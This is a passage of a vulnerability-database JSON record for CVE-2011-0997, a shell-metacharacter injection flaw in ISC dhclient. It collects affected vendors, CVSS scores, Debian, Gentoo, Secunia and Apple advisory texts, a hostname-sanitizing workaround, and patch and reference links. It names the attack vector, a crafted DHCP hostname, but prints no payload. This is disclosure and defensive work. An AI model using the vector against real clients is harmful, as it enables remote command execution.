        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "slackware linux",
        "version": null
      },
      {
        "_id": null,
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      },
      {
        "_id": null,
        "model": "airmac base station",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "apple",
        "version": "7.6"
      },
      {
        "_id": null,
        "model": "time capsule",
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#107886"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201104-043"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0997"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:apple:airport_base_station_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:apple:time_capsule",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Debian",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "100273"
      },
      {
        "db": "PACKETSTORM",
        "id": "100274"
      }
    ],
    "trust": 0.2
  },
  "cve": "CVE-2011-0997",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2011-0997",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2011-0997",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#107886",
            "trust": 0.8,
            "value": "11.34"
          },
          {
            "author": "NVD",
            "id": "CVE-2011-0997",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201104-043",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2011-0997",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#107886"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-0997"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201104-043"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0997"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message, as demonstrated by a hostname that is provided to dhclient-script. The ISC dhclient contains a vulnerability that could allow a remote attacker to execute arbitrary code on the client machine. Apple From Apple Time Capsule and AirPort Base Station (802.11n) Firmware update for has been released.Crafted DHCP Any command may be executed by processing the response. Depending on the script and OS, this can result in execution of exploit code on the client. \n\nCVSS Score: 6.8 (AV:A/AC:L/Au:N/C:P/I:N/A:C)\n\nFor more information on CVSS scores, visit http://nvd.nist.gov/cvss.cfm?calculator\u0026adv\u0026version=2 \n\nWorkarounds: \n\nOn SUSE systems, it is possible to disable hostname update by setting DHCLIENT_SET_HOSTNAME=\"no\" in /etc/sysconfig/network/dhcp. \n\nOther systems may add following line to dhclient-script at the beginning of the set_hostname() function:\n\nnew_host_name=${new_host_name//[^-.a-zA-Z0-9]/}\n\nIn environments where filters/acls can be put into place to limit clients to accessing only legitimate dhcp servers, this will protect clients from rogue dhcp servers deliberately trying to exploit this bug. However, this will not protect from compromised servers. \n\n\nActive exploits: \n\nNone known at this time.  https://www.isc.org/downloads/all\n\nNo patch is available for 4.0.x as it is EOL.  Anyone running 4.1.x should upgrade to 4.1-ESV-R2. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2216-1                   security@debian.org\nhttp://www.debian.org/security/                                Nico Golde\nApril 10, 2011                         http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : isc-dhcp\nVulnerability  : missing input sanitization\nProblem type   : remote\nDebian-specific: no\nCVE ID         : CVE-2011-0997\nDebian bug     : 621099\n\nSebastian Krahmer and Marius Tomaschewski discovered that dhclient of\nisc-dhcp, a DHCP client, is not properly filtering shell meta-characters\nin certain options in DHCP server responses.  These options are reused in\nan insecure fashion by dhclient scripts. \n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nadditional update for dhcp3. \n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 4.1.1-P1-15+squeeze2. \n\nFor the testing distribution (wheezy), this problem will be fixed soon. \n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.1.1-P1-16.1. \n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niEYEARECAAYFAk2iJ1AACgkQHYflSXNkfP8fEwCglH3YEMa8hlo7ChGFlvT7K9v5\nBMcAoIuGqJofENG1o5SiXU1/E9qEF/Am\n=5Q/C\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201301-06\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: ISC DHCP: Denial of Service\n     Date: January 09, 2013\n     Bugs: #362453, #378799, #393617, #398763, #428120, #434880\n       ID: 201301-06\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in ISC DHCP, the worst of\nwhich may allow remote Denial of Service. \n\nBackground\n==========\n\nISC DHCP is a Dynamic Host Configuration Protocol (DHCP) client/server. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/dhcp               \u003c 4.2.4_p2               \u003e= 4.2.4_p2\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in ISC DHCP. Please\nreview the CVE identifiers referenced below for details. 
\n\nResolution\n==========\n\nAll ISC DHCP users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/dhcp-4.2.4_p2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2011-0997\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0997\n[ 2 ] CVE-2011-2748\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2748\n[ 3 ] CVE-2011-2749\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2749\n[ 4 ] CVE-2011-4539\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4539\n[ 5 ] CVE-2011-4868\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4868\n[ 6 ] CVE-2012-3570\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3570\n[ 7 ] CVE-2012-3571\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3571\n[ 8 ] CVE-2012-3954\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3954\n[ 9 ] CVE-2012-3955\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3955\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201301-06.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2013 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. This issue is addressed by stripping shell meta-characters\nin dhclient-script. \n\nIt is recommended that AirPort Utility 5.5.3 or later be installed\nbefore upgrading to Firmware version 7.6. 
----------------------------------------------------------------------\n\n\nQ1 Factsheets released:\n\nhttp://secunia.com/resources/factsheets/2011_vendor/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nISC DHCP \"dhclient\" Response Processing Input Sanitation\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA44037\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/44037/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44037\n\nRELEASE DATE:\n2011-04-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/44037/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/44037/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44037\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in ISC DHCP, which can be exploited\nby malicious people to compromise a vulnerable system. \n\nThe vulnerability is caused due to certain shell meta-characters not\nbeing stripped or escaped when processing responses from a DHCP\nserver. This can be exploited to submit shell commands to the\n\"dhclient-script\" script via e.g. a specially crafted \"hostname\"\nresponse. \n\nThe vulnerability is reported in versions 3.0.x through 4.2.x. \n\nSOLUTION:\nUpdate to version 3.1-ESV-R1 and 4.1-ESV-R2 or 4.2.1-P1. 
\n\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Sebastian Krahmer and Marius Tomaschewski, SUSE\nSecurity Team. \n\nORIGINAL ADVISORY:\nhttps://www.isc.org/software/dhcp/advisories/cve-2011-0997\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-0997"
      },
      {
        "db": "CERT/CC",
        "id": "VU#107886"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-0997"
      },
      {
        "db": "PACKETSTORM",
        "id": "100160"
      },
      {
        "db": "PACKETSTORM",
        "id": "100273"
      },
      {
        "db": "PACKETSTORM",
        "id": "119354"
      },
      {
        "db": "PACKETSTORM",
        "id": "106987"
      },
      {
        "db": "PACKETSTORM",
        "id": "100274"
      },
      {
        "db": "PACKETSTORM",
        "id": "100149"
      }
    ],
    "trust": 2.97
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#107886",
        "trust": 3.3
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0997",
        "trust": 3.1
      },
      {
        "db": "SECUNIA",
        "id": "44037",
        "trust": 1.9
      },
      {
        "db": "VUPEN",
        "id": "ADV-2011-1000",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2011-0909",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2011-0915",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2011-0926",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2011-0965",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2011-0879",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2011-0886",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "44103",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "44127",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "44048",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "44180",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "44089",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "44090",
        "trust": 1.7
      },
      {
        "db": "SECTRACK",
        "id": "1025300",
        "trust": 1.7
      },
      {
        "db": "JUNIPER",
        "id": "JSA10761",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "47176",
        "trust": 1.7
      },
      {
        "db": "OSVDB",
        "id": "71493",
        "trust": 1.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "37623",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201104-043",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-0997",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "100160",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "100273",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "119354",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106987",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "100274",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "100149",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#107886"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-0997"
      },
      {
        "db": "PACKETSTORM",
        "id": "100160"
      },
      {
        "db": "PACKETSTORM",
        "id": "100273"
      },
      {
        "db": "PACKETSTORM",
        "id": "119354"
      },
      {
        "db": "PACKETSTORM",
        "id": "106987"
      },
      {
        "db": "PACKETSTORM",
        "id": "100274"
      },
      {
        "db": "PACKETSTORM",
        "id": "100149"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201104-043"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0997"
      }
    ]
  },
  "id": "VAR-201104-0082",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.413494225
  },
  "last_update_date": "2026-03-09T22:43:44.086000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "HT5005",
        "trust": 0.8,
        "url": "http://support.apple.com/kb/HT5005"
      },
      {
        "title": "ISC DHCP dhclient Response processing shell Measures to fix meta-character code execution vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113225"
      },
      {
        "title": "Debian CVElist Bug Report Logs: isc-dhcp-client: CVE-2011-0997",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=a3bf1099a3f6410da5cb17491cb28710"
      },
      {
        "title": "Ubuntu Security Notice: dhcp3 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1108-2"
      },
      {
        "title": "Ubuntu Security Notice: dhcp3 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1108-1"
      },
      {
        "title": "Debian Security Advisories: DSA-2216-1 isc-dhcp -- missing input sanitization",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=9079594e67dfba2ce5fd90c652ce64af"
      },
      {
        "title": "Debian CVElist Bug Report Logs: CVE-2011-2716 udhcpc insufficient checking of DHCP options",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d937c5addcd54815f7f0480b4b3a55e2"
      },
      {
        "title": "VMware Security Advisories: VMware ESX third party updates for Service Console packages glibc and dhcp",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=386db0c9014e75eeed9029418ea6714f"
      },
      {
        "title": "Citrix Security Bulletins: Archive: Citrix XenServer Multiple Security Updates",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=30a988053a9b9c888e66371d7b3040f2"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/critical-rce-bug-avaya-voip-phones/147122/"
      },
      {
        "title": "BleepingComputer",
        "trust": 0.1,
        "url": "https://www.bleepingcomputer.com/news/security/avaya-voip-phones-harbored-10-year-old-vulnerability/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2011-0997"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201104-043"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0997"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.6,
        "url": "http://www.kb.cert.org/vuls/id/107886"
      },
      {
        "trust": 1.8,
        "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
      },
      {
        "trust": 1.8,
        "url": "https://www.isc.org/software/dhcp/advisories/cve-2011-0997"
      },
      {
        "trust": 1.7,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761"
      },
      {
        "trust": 1.7,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-april/057888.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-april/058279.html"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=133226187115472\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/44037"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/44048"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/44089"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/44090"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/44103"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/44127"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/44180"
      },
      {
        "trust": 1.7,
        "url": "http://securitytracker.com/id?1025300"
      },
      {
        "trust": 1.7,
        "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2011\u0026m=slackware-security.593345"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2011/dsa-2216"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2011/dsa-2217"
      },
      {
        "trust": 1.7,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2011:073"
      },
      {
        "trust": 1.7,
        "url": "http://www.osvdb.org/71493"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2011-0428.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2011-0840.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/47176"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-1108-1"
      },
      {
        "trust": 1.7,
        "url": "http://www.vupen.com/english/advisories/2011/0879"
      },
      {
        "trust": 1.7,
        "url": "http://www.vupen.com/english/advisories/2011/0886"
      },
      {
        "trust": 1.7,
        "url": "http://www.vupen.com/english/advisories/2011/0909"
      },
      {
        "trust": 1.7,
        "url": "http://www.vupen.com/english/advisories/2011/0915"
      },
      {
        "trust": 1.7,
        "url": "http://www.vupen.com/english/advisories/2011/0926"
      },
      {
        "trust": 1.7,
        "url": "http://www.vupen.com/english/advisories/2011/0965"
      },
      {
        "trust": 1.7,
        "url": "http://www.vupen.com/english/advisories/2011/1000"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=689832"
      },
      {
        "trust": 1.7,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66580"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a12812"
      },
      {
        "trust": 1.7,
        "url": "https://www.exploit-db.com/exploits/37623/"
      },
      {
        "trust": 0.8,
        "url": "about vulnerability notes"
      },
      {
        "trust": 0.8,
        "url": "contact us about this vulnerability"
      },
      {
        "trust": 0.8,
        "url": "provide a vendor statement"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0997"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/cert/jvnvu107886/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/cert/jvnvu309451/"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-0997"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0997"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.2,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=621099"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/vulnerabilities/linuxrpm-rhsa-2011-0428"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/1108-2/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.isc.org/downloads/all"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/cvss.cfm?calculator\u0026adv\u0026version=2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2748"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0997"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3955"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3571"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3954"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4539"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3570"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4868"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3954"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4539"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2749"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2749"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3570"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3955"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3571"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2748"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4868"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "http://www.apple.com/support/downloads/"
      },
      {
        "trust": 0.1,
        "url": "http://support.apple.com/kb/ht1222"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44037"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/products/corporate/evm/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/44037/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/44037/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/resources/factsheets/2011_vendor/"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#107886"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-0997"
      },
      {
        "db": "PACKETSTORM",
        "id": "100160"
      },
      {
        "db": "PACKETSTORM",
        "id": "100273"
      },
      {
        "db": "PACKETSTORM",
        "id": "119354"
      },
      {
        "db": "PACKETSTORM",
        "id": "106987"
      },
      {
        "db": "PACKETSTORM",
        "id": "100274"
      },
      {
        "db": "PACKETSTORM",
        "id": "100149"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201104-043"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0997"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#107886",
        "ident": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-0997",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "100160",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "100273",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "119354",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "106987",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "100274",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "100149",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201104-043",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003066",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0997",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2011-04-05T00:00:00",
        "db": "CERT/CC",
        "id": "VU#107886",
        "ident": null
      },
      {
        "date": "2011-04-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2011-0997",
        "ident": null
      },
      {
